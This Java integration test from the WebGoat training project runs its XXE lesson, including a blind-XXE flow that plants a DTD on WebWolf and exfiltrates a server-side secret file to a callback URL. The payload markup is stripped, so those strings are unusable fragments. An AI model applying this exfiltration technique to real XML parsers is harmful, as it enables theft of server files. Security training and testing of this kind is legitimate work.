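/*
 * SPDX-FileCopyrightText: Copyright © 2019 WebGoat authors
 * SPDX-License-Identifier: GPL-2.0-or-later
 */
package org.owasp.webgoat.integration;

import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import org.junit.jupiter.api.Test;

/**
 * Integration test for the XXE lesson.
 *
 * <p>Everything in this class is a deliberate XML External Entity attack against the WebGoat
 * training instance: the simple and content-type assignments resolve an external entity, and the
 * blind assignment exfiltrates the per-user secret file out-of-band through a DTD hosted on
 * WebWolf. None of this is a template for production XML handling (a hardened parser disables
 * DTDs and external entities altogether).
 */
public class XXEIntegrationTest extends IntegrationTest {

  // NOTE(review): the XML markup of the four payloads below (prolog, DOCTYPE, entity declarations
  // and surrounding elements) appears to have been stripped from this copy of the file; only the
  // entity references survived. Restore them from the upstream source before running the test.
  private static final String xxe3 =
      """
      ]>&xxe;test
      """;

  private static final String xxe4 =
      """
      ]>&xxe;test
      """;

  /** Blind-XXE DTD; WEBWOLFURL and SECRET are substituted in {@link #getSecret()}. */
  private static final String dtd7 =
      """
      ">%all;
      """;

  /** Blind-XXE request body that pulls the uploaded DTD from WebWolf (WEBWOLFURL, USERNAME). */
  private static final String xxe7 =
      """
      %remote;]>test&send;
      """;

  /** Prefix of the secret written by the lesson; used to find it in WebWolf's request log. */
  private static final String SECRET_MARKER = "WebGoat 8.0 rocks... (";

  /**
   * Length of the complete secret string, marker included (previously the hard-coded 33).
   * Presumably marker + random token + ')' — verify against the lesson if the format changes.
   */
  private static final int SECRET_LENGTH = 33;

  private String webGoatHomeDirectory;

  // TODO fix me
  //  /*
  //   * This test is to verify that all is secure when XXE security patch is applied.
  //   */
  //  @Test
  //  public void xxeSecure() throws IOException {
  //    startLesson("XXE");
  //    webGoatHomeDirectory = webGoatServerDirectory();
  //    RestAssured.given()
  //        .when()
  //        .relaxedHTTPSValidation()
  //        .cookie("JSESSIONID", getWebGoatCookie())
  //        .get(url("service/enable-security.mvc"))
  //        .then()
  //        .statusCode(200);
  //    checkAssignment(url("xxe/simple"), ContentType.XML, xxe3, false);
  //    checkAssignment(url("xxe/content-type"), ContentType.XML, xxe4, false);
  //    checkAssignment(
  //        url("xxe/blind"),
  //        ContentType.XML,
  //        "" + getSecret() + "",
  //        false);
  //  }

  /**
   * Performs the blind-XXE exfiltration steps so the secret can be submitted in the final step.
   *
   * <p>Sequence: upload the parameter-entity DTD to WebWolf, send the XXE payload that makes
   * WebGoat fetch that DTD and leak the secret file to the WebWolf landing URL, then scrape the
   * secret out of WebWolf's request log.
   *
   * @return the secret string as found in WebWolf's request log, or the whole (partially
   *     URL-decoded) log text when the secret marker is not present
   */
  private String getSecret() {
    // Path of the per-user secret file that the DTD instructs WebGoat to read.
    String secretFile = webGoatHomeDirectory.concat("/XXE/" + getUser() + "/secret.txt");
    String webWolfCallback = new WebWolfUrlBuilder().path("landing").attackMode().build();
    String dtd7String =
        dtd7.replace("WEBWOLFURL", webWolfCallback).replace("SECRET", secretFile);

    // Upload the DTD. The bytes are parsed by another process, so encode explicitly instead of
    // depending on the JVM's platform default charset (pre-18 getBytes() is platform-dependent).
    // relaxedHTTPSValidation() disables certificate checking; acceptable only because the target
    // is the local test instance.
    RestAssured.given()
        .when()
        .relaxedHTTPSValidation()
        .cookie("WEBWOLFSESSION", getWebWolfCookie())
        .multiPart("file", "blind.dtd", dtd7String.getBytes(StandardCharsets.UTF_8))
        .post(new WebWolfUrlBuilder().path("fileupload").build())
        .then()
        .extract()
        .response()
        .getBody()
        .asString();

    // Send the attack: WebGoat's parser fetches the DTD from WebWolf's "files" endpoint.
    String xxe7String =
        xxe7.replace("WEBWOLFURL", new WebWolfUrlBuilder().attackMode().path("files").build())
            .replace("USERNAME", this.getUser());
    checkAssignment(url("xxe/blind"), ContentType.XML, xxe7String, false);

    // Read the leaked secret back from WebWolf's request log.
    String log =
        RestAssured.given()
            .when()
            .relaxedHTTPSValidation()
            .cookie("WEBWOLFSESSION", getWebWolfCookie())
            .get(new WebWolfUrlBuilder().path("requests").build())
            .then()
            .extract()
            .response()
            .getBody()
            .asString();

    // The secret arrives URL-encoded in the callback path; only the space needs decoding here,
    // and a full URLDecoder pass over the whole log could trip on unrelated malformed '%' runs.
    String result = log.replace("%20", " ");
    int start = result.lastIndexOf(SECRET_MARKER);
    if (start != -1) {
      // Bound the end index so a truncated log entry fails the later assertion instead of
      // throwing StringIndexOutOfBoundsException from here.
      int end = Math.min(result.length(), start + SECRET_LENGTH);
      result = result.substring(start, end);
    }
    return result;
  }

  /**
   * Runs the three XXE assignments against WebGoat and checks the lesson is marked solved.
   *
   * @throws IOException propagated from the lesson/assignment helpers
   */
  @Test
  public void runTests() throws IOException {
    startLesson("XXE", true);
    webGoatHomeDirectory = webGoatServerDirectory();

    checkAssignment(url("xxe/simple"), ContentType.XML, xxe3, true);
    checkAssignment(url("xxe/content-type"), ContentType.XML, xxe4, true);
    // NOTE(review): the wrapping element markup around the secret also looks stripped in this
    // copy (the empty "" + ... + "" concatenation); restore it together with the payloads above.
    checkAssignment(url("xxe/blind"), ContentType.XML, "" + getSecret() + "", true);

    checkResults("XXE");
  }
}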